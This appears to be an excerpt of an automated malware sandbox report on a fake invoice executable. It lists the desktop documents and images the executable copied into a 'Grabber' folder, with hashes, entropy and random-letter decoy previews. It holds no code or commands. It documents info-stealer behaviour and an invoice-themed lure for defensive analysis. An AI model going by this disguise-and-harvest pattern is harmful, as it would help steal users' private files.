Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DTBZGIOOSO\DTBZGIOOSO.docx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DTBZGIOOSO\ONBQCLYSPU.pdf

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DTBZGIOOSO\UMMBDNEQBN.png

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DTBZGIOOSO\VLZDGUKUTZ.jpg

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DTBZGIOOSO\XZXHAVGRAG.xlsx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DVWHKMNFNN.jpg

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS.pdf

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LTKMYBSEYZ.pdf

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NWTVCDUMOB.png

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
